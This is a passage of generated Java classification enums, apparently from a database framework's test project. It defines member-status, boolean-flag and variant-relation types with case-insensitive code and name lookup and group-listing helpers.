});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemImplicit> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static SubItemImplicit codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof SubItemImplicit) { return (SubItemImplicit)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static SubItemImplicit nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<SubItemImplicit> listAll() {
return new ArrayList<SubItemImplicit>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<SubItemImplicit> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: SubItemImplicit." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<SubItemImplicit> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<SubItemImplicit> clsList = new ArrayList<SubItemImplicit>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<SubItemImplicit> groupOf(String groupName) {
return new ArrayList<SubItemImplicit>(4);
}
@Override public String toString() { return code(); }
}
/**
* the test of sub-item map for table classification
*/
public enum SubItemTable implements CDef {
/** 正式会員: 正式な会員としてサイトサービスが利用可能 */
正式会員("FML", "正式会員", emptyStrings())
,
/** 退会会員: 退会が確定した会員でサイトサービスはダメ */
退会会員("WDL", "退会会員", emptyStrings())
,
/** 仮会員: 入会直後のステータスで一部のサイトサービスが利用可能 */
仮会員("PRV", "仮会員", emptyStrings())
;
private static final Map<String, SubItemTable> _codeClsMap = new HashMap<String, SubItemTable>();
private static final Map<String, SubItemTable> _nameClsMap = new HashMap<String, SubItemTable>();
static {
for (SubItemTable value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private static final Map<String, Map<String, Object>> _subItemMapMap = new HashMap<String, Map<String, Object>>();
static {
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("key1", "1");
subItemMap.put("key2", "正式会員");
subItemMap.put("key3", null);
_subItemMapMap.put(正式会員.code(), Collections.unmodifiableMap(subItemMap));
}
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("key1", "2");
subItemMap.put("key2", "退会会員");
subItemMap.put("key3", null);
_subItemMapMap.put(退会会員.code(), Collections.unmodifiableMap(subItemMap));
}
{
Map<String, Object> subItemMap = new HashMap<String, Object>();
subItemMap.put("key1", "3");
subItemMap.put("key2", "仮会員");
subItemMap.put("key3", null);
_subItemMapMap.put(仮会員.code(), Collections.unmodifiableMap(subItemMap));
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private SubItemTable(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return _subItemMapMap.get(code()); }
public ClassificationMeta meta() { return CDef.DefMeta.SubItemTable; }
public String key1() {
return (String)subItemMap().get("key1");
}
public String key2() {
return (String)subItemMap().get("key2");
}
public String key3() {
return (String)subItemMap().get("key3");
}
/**
* Is the classification in the group? <br>
* サービスが利用できる会員 <br>
* The group elements:[正式会員, 仮会員]
* @return The determination, true or false.
*/
public boolean isServiceAvailable() {
return 正式会員.equals(this) || 仮会員.equals(this);
}
/**
* Is the classification in the group? <br>
* The group elements:[退会会員]
* @return The determination, true or false.
*/
public boolean isLastestStatus() {
return 退会会員.equals(this);
}
public boolean inGroup(String groupName) {
if ("serviceAvailable".equals(groupName)) { return isServiceAvailable(); }
if ("lastestStatus".equals(groupName)) { return isLastestStatus(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemTable> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof SubItemTable) { return OptionalThing.of((SubItemTable)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<SubItemTable> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static SubItemTable codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof SubItemTable) { return (SubItemTable)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static SubItemTable nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<SubItemTable> listAll() {
return new ArrayList<SubItemTable>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<SubItemTable> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("serviceAvailable".equalsIgnoreCase(groupName)) { return listOfServiceAvailable(); }
if ("lastestStatus".equalsIgnoreCase(groupName)) { return listOfLastestStatus(); }
throw new ClassificationNotFoundException("Unknown classification group: SubItemTable." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<SubItemTable> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<SubItemTable> clsList = new ArrayList<SubItemTable>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* サービスが利用できる会員 <br>
* The group elements:[正式会員, 仮会員]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<SubItemTable> listOfServiceAvailable() {
return new ArrayList<SubItemTable>(Arrays.asList(正式会員, 仮会員));
}
/**
* Get the list of group classification elements. (returns new copied list) <br>
* The group elements:[退会会員]
* @return The snapshot list of classification elements in the group. (NotNull)
*/
public static List<SubItemTable> listOfLastestStatus() {
return new ArrayList<SubItemTable>(Arrays.asList(退会会員));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<SubItemTable> groupOf(String groupName) {
if ("serviceAvailable".equals(groupName)) { return listOfServiceAvailable(); }
if ("lastestStatus".equals(groupName)) { return listOfLastestStatus(); }
return new ArrayList<SubItemTable>(4);
}
@Override public String toString() { return code(); }
}
/**
* boolean classification for boolean column
*/
public enum BooleanFlg implements CDef {
/** Checked: means yes */
True("true", "Checked", emptyStrings())
,
/** Unchecked: means no */
False("false", "Unchecked", emptyStrings())
;
private static final Map<String, BooleanFlg> _codeClsMap = new HashMap<String, BooleanFlg>();
private static final Map<String, BooleanFlg> _nameClsMap = new HashMap<String, BooleanFlg>();
static {
for (BooleanFlg value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private BooleanFlg(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.BooleanFlg; }
public boolean inGroup(String groupName) {
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<BooleanFlg> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof BooleanFlg) { return OptionalThing.of((BooleanFlg)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<BooleanFlg> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static BooleanFlg codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof BooleanFlg) { return (BooleanFlg)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static BooleanFlg nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<BooleanFlg> listAll() {
return new ArrayList<BooleanFlg>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<BooleanFlg> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
throw new ClassificationNotFoundException("Unknown classification group: BooleanFlg." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<BooleanFlg> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<BooleanFlg> clsList = new ArrayList<BooleanFlg>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
*/
public static List<BooleanFlg> groupOf(String groupName) {
return new ArrayList<BooleanFlg>(4);
}
@Override public String toString() { return code(); }
}
/**
* master type of variant relation (biz-many-to-one)
*/
public enum VariantRelationMasterType implements CDef {
/** FooCls */
FooCls("FOO", "FooCls", emptyStrings())
,
/** BarCls */
BarCls("BAR", "BarCls", emptyStrings())
,
/** QuxCls */
QuxCls("QUX", "QuxCls", emptyStrings())
,
/** CorgeCls */
CorgeCls("CORGE", "CorgeCls", emptyStrings())
;
private static final Map<String, VariantRelationMasterType> _codeClsMap = new HashMap<String, VariantRelationMasterType>();
private static final Map<String, VariantRelationMasterType> _nameClsMap = new HashMap<String, VariantRelationMasterType>();
static {
for (VariantRelationMasterType value : values()) {
_codeClsMap.put(value.code().toLowerCase(), value);
for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
_nameClsMap.put(value.name().toLowerCase(), value);
}
}
private String _code; private String _alias; private Set<String> _sisterSet;
private VariantRelationMasterType(String code, String alias, String[] sisters)
{ _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
public String code() { return _code; } public String alias() { return _alias; }
public Set<String> sisterSet() { return _sisterSet; }
public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
public ClassificationMeta meta() { return CDef.DefMeta.VariantRelationMasterType; }
/**
* Is the classification in the group? <br>
* Foo or Bar or Qux <br>
* The group elements:[FooCls, BarCls, QuxCls]
* @return The determination, true or false.
*/
public boolean isFooBarQux() {
return FooCls.equals(this) || BarCls.equals(this) || QuxCls.equals(this);
}
public boolean inGroup(String groupName) {
if ("fooBarQux".equals(groupName)) { return isFooBarQux(); }
return false;
}
/**
* Get the classification of the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
* @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<VariantRelationMasterType> of(Object code) {
if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
if (code instanceof VariantRelationMasterType) { return OptionalThing.of((VariantRelationMasterType)code); }
if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification code: " + code);
});
}
/**
* Find the classification by the name. (CaseInsensitive)
* @param name The string of name, which is case-insensitive. (NotNull)
* @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
*/
public static OptionalThing<VariantRelationMasterType> byName(String name) {
if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
throw new ClassificationNotFoundException("Unknown classification name: " + name);
});
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
* Get the classification by the code. (CaseInsensitive)
* @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
*/
public static VariantRelationMasterType codeOf(Object code) {
if (code == null) { return null; }
if (code instanceof VariantRelationMasterType) { return (VariantRelationMasterType)code; }
return _codeClsMap.get(code.toString().toLowerCase());
}
/**
* <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
* Get the classification by the name (also called 'value' in ENUM world).
* @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
* @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
*/
public static VariantRelationMasterType nameOf(String name) {
if (name == null) { return null; }
try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
}
/**
* Get the list of all classification elements. (returns new copied list)
* @return The snapshot list of all classification elements. (NotNull)
*/
public static List<VariantRelationMasterType> listAll() {
return new ArrayList<VariantRelationMasterType>(Arrays.asList(values()));
}
/**
* Get the list of classification elements in the specified group. (returns new copied list) <br>
* @param groupName The string of group name, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
*/
public static List<VariantRelationMasterType> listByGroup(String groupName) {
if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
if ("fooBarQux".equalsIgnoreCase(groupName)) { return listOfFooBarQux(); }
throw new ClassificationNotFoundException("Unknown classification group: VariantRelationMasterType." + groupName);
}
/**
* Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
* @param codeList The list of plain code, which is case-insensitive. (NotNull)
* @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
*/
public static List<VariantRelationMasterType> listOf(Collection<String> codeList) {
if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
List<VariantRelationMasterType> clsList = new ArrayList<VariantRelationMasterType>(codeList.size());
for (String code : codeList) { clsList.add(of(code).get()); }
return clsList;
}
/**
 * Build the snapshot list for the 'fooBarQux' group. (returns new copied list) <br>
 * Foo or Bar or Qux <br>
 * The group elements:[FooCls, BarCls, QuxCls]
 * @return A new mutable list of the group elements, in group order. (NotNull)
 */
public static List<VariantRelationMasterType> listOfFooBarQux() {
    List<VariantRelationMasterType> groupList = new ArrayList<VariantRelationMasterType>();
    groupList.add(FooCls);
    groupList.add(BarCls);
    groupList.add(QuxCls);
    return groupList;
}
/**
 * Resolve the elements of the named group, case-sensitively. (returns new copied list) <br>
 * Unlike listByGroup, null and unknown names yield an empty list instead of throwing.
 * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
 * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
 */
public static List<VariantRelationMasterType> groupOf(String groupName) {
    boolean fooBarQuxRequested = "fooBarQux".equals(groupName);
    return fooBarQuxRequested ? listOfFooBarQux() : new ArrayList<VariantRelationMasterType>(4);
}
@Override public String toString() { return code(); }
}
/**
 * qux type of variant relation (biz-many-to-one)
 */
public enum VariantRelationQuxType implements CDef {
    /** Qua */
    Qua("Qua", "Qua", emptyStrings())
    ,
    /** Que */
    Que("Que", "Que", emptyStrings())
    ,
    /** Quo */
    Quo("Quo", "Quo", emptyStrings())
    ;
    // case-insensitive lookup tables: lower-cased code (and sister codes) / lower-cased name -> element
    private static final Map<String, VariantRelationQuxType> _codeClsMap = new HashMap<String, VariantRelationQuxType>();
    private static final Map<String, VariantRelationQuxType> _nameClsMap = new HashMap<String, VariantRelationQuxType>();
    static {
        // register every element eagerly so of()/byName() resolve without scanning values()
        for (VariantRelationQuxType value : values()) {
            _codeClsMap.put(value.code().toLowerCase(), value);
            for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
            _nameClsMap.put(value.name().toLowerCase(), value);
        }
    }
    // immutable per-element state: plain code, display alias, alternative (sister) codes
    private String _code; private String _alias; private Set<String> _sisterSet;
    private VariantRelationQuxType(String code, String alias, String[] sisters)
    { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
    public String code() { return _code; } public String alias() { return _alias; }
    public Set<String> sisterSet() { return _sisterSet; }
    public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
    public ClassificationMeta meta() { return CDef.DefMeta.VariantRelationQuxType; }
    public boolean inGroup(String groupName) {
        // this classification defines no groups
        return false;
    }
    /**
     * Get the classification of the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
     * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<VariantRelationQuxType> of(Object code) {
        if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
        if (code instanceof VariantRelationQuxType) { return OptionalThing.of((VariantRelationQuxType)code); }
        if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
        return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification code: " + code);
        });
    }
    /**
     * Find the classification by the name. (CaseInsensitive)
     * @param name The string of name, which is case-insensitive. (NotNull)
     * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<VariantRelationQuxType> byName(String name) {
        if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
        return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification name: " + name);
        });
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
     * Get the classification by the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
     */
    public static VariantRelationQuxType codeOf(Object code) {
        if (code == null) { return null; }
        if (code instanceof VariantRelationQuxType) { return (VariantRelationQuxType)code; }
        return _codeClsMap.get(code.toString().toLowerCase());
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
     * Get the classification by the name (also called 'value' in ENUM world).
     * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
     */
    public static VariantRelationQuxType nameOf(String name) {
        if (name == null) { return null; }
        // valueOf throws on unknown names; this legacy accessor maps that to null
        try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
    }
    /**
     * Get the list of all classification elements. (returns new copied list)
     * @return The snapshot list of all classification elements. (NotNull)
     */
    public static List<VariantRelationQuxType> listAll() {
        return new ArrayList<VariantRelationQuxType>(Arrays.asList(values()));
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
     */
    public static List<VariantRelationQuxType> listByGroup(String groupName) {
        if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
        // no groups are defined for this classification, so any name is unknown
        throw new ClassificationNotFoundException("Unknown classification group: VariantRelationQuxType." + groupName);
    }
    /**
     * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
     * @param codeList The list of plain code, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
     */
    public static List<VariantRelationQuxType> listOf(Collection<String> codeList) {
        if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
        List<VariantRelationQuxType> clsList = new ArrayList<VariantRelationQuxType>(codeList.size());
        for (String code : codeList) { clsList.add(of(code).get()); }
        return clsList;
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-sensitive. (NullAllowed: if null, returns empty list)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if the group is not found)
     */
    public static List<VariantRelationQuxType> groupOf(String groupName) {
        // no groups are defined, so always an empty (pre-sized) list
        return new ArrayList<VariantRelationQuxType>(4);
    }
    @Override public String toString() { return code(); }
}
/**
 * merged
 */
public enum QuxCls implements CDef {
    /** Merged: merged qux element */
    Merged("MRG", "Merged", emptyStrings())
    ,
    /** QuxOne: QuxOne */
    QuxOne("Q01", "QuxOne", emptyStrings())
    ,
    /** QuxTwo: QuxTwo */
    QuxTwo("Q02", "QuxTwo", emptyStrings())
    ,
    /** QuxThree: QuxThree */
    QuxThree("Q03", "QuxThree", emptyStrings())
    ;
    // case-insensitive lookup tables: lower-cased code (and sister codes) / lower-cased name -> element
    private static final Map<String, QuxCls> _codeClsMap = new HashMap<String, QuxCls>();
    private static final Map<String, QuxCls> _nameClsMap = new HashMap<String, QuxCls>();
    static {
        // register every element eagerly so of()/byName() resolve without scanning values()
        for (QuxCls value : values()) {
            _codeClsMap.put(value.code().toLowerCase(), value);
            for (String sister : value.sisterSet()) { _codeClsMap.put(sister.toLowerCase(), value); }
            _nameClsMap.put(value.name().toLowerCase(), value);
        }
    }
    // immutable per-element state: plain code, display alias, alternative (sister) codes
    private String _code; private String _alias; private Set<String> _sisterSet;
    private QuxCls(String code, String alias, String[] sisters)
    { _code = code; _alias = alias; _sisterSet = Collections.unmodifiableSet(new LinkedHashSet<String>(Arrays.asList(sisters))); }
    public String code() { return _code; } public String alias() { return _alias; }
    public Set<String> sisterSet() { return _sisterSet; }
    public Map<String, Object> subItemMap() { return Collections.emptyMap(); }
    public ClassificationMeta meta() { return CDef.DefMeta.QuxCls; }
    public boolean inGroup(String groupName) {
        // this classification defines no groups
        return false;
    }
    /**
     * Get the classification of the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns empty)
     * @return The optional classification corresponding to the code. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<QuxCls> of(Object code) {
        if (code == null) { return OptionalThing.ofNullable(null, () -> { throw new ClassificationNotFoundException("null code specified"); }); }
        if (code instanceof QuxCls) { return OptionalThing.of((QuxCls)code); }
        if (code instanceof OptionalThing<?>) { return of(((OptionalThing<?>)code).orElse(null)); }
        return OptionalThing.ofNullable(_codeClsMap.get(code.toString().toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification code: " + code);
        });
    }
    /**
     * Find the classification by the name. (CaseInsensitive)
     * @param name The string of name, which is case-insensitive. (NotNull)
     * @return The optional classification corresponding to the name. (NotNull, EmptyAllowed: if not found, returns empty)
     */
    public static OptionalThing<QuxCls> byName(String name) {
        if (name == null) { throw new IllegalArgumentException("The argument 'name' should not be null."); }
        return OptionalThing.ofNullable(_nameClsMap.get(name.toLowerCase()), () ->{
            throw new ClassificationNotFoundException("Unknown classification name: " + name);
        });
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use of(code).</span> <br>
     * Get the classification by the code. (CaseInsensitive)
     * @param code The value of code, which is case-insensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the code. (NullAllowed: if not found, returns null)
     */
    public static QuxCls codeOf(Object code) {
        if (code == null) { return null; }
        if (code instanceof QuxCls) { return (QuxCls)code; }
        return _codeClsMap.get(code.toString().toLowerCase());
    }
    /**
     * <span style="color: #AD4747; font-size: 120%">Old style so use byName(name).</span> <br>
     * Get the classification by the name (also called 'value' in ENUM world).
     * @param name The string of name, which is case-sensitive. (NullAllowed: if null, returns null)
     * @return The instance of the corresponding classification to the name. (NullAllowed: if not found, returns null)
     */
    public static QuxCls nameOf(String name) {
        if (name == null) { return null; }
        // valueOf throws on unknown names; this legacy accessor maps that to null
        try { return valueOf(name); } catch (RuntimeException ignored) { return null; }
    }
    /**
     * Get the list of all classification elements. (returns new copied list)
     * @return The snapshot list of all classification elements. (NotNull)
     */
    public static List<QuxCls> listAll() {
        return new ArrayList<QuxCls>(Arrays.asList(values()));
    }
    /**
     * Get the list of classification elements in the specified group. (returns new copied list) <br>
     * @param groupName The string of group name, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the group. (NotNull, EmptyAllowed: if not found, throws exception)
     */
    public static List<QuxCls> listByGroup(String groupName) {
        if (groupName == null) { throw new IllegalArgumentException("The argument 'groupName' should not be null."); }
        // no groups are defined for this classification, so any name is unknown
        throw new ClassificationNotFoundException("Unknown classification group: QuxCls." + groupName);
    }
    /**
     * Get the list of classification elements corresponding to the specified codes. (returns new copied list) <br>
     * @param codeList The list of plain code, which is case-insensitive. (NotNull)
     * @return The snapshot list of classification elements in the code list. (NotNull, EmptyAllowed: when empty specified)
     */
    public static List<QuxCls> listOf(Collection<String> codeList) {
        if (codeList == null) { throw new IllegalArgumentException("The argument 'codeList' should not be null."); }
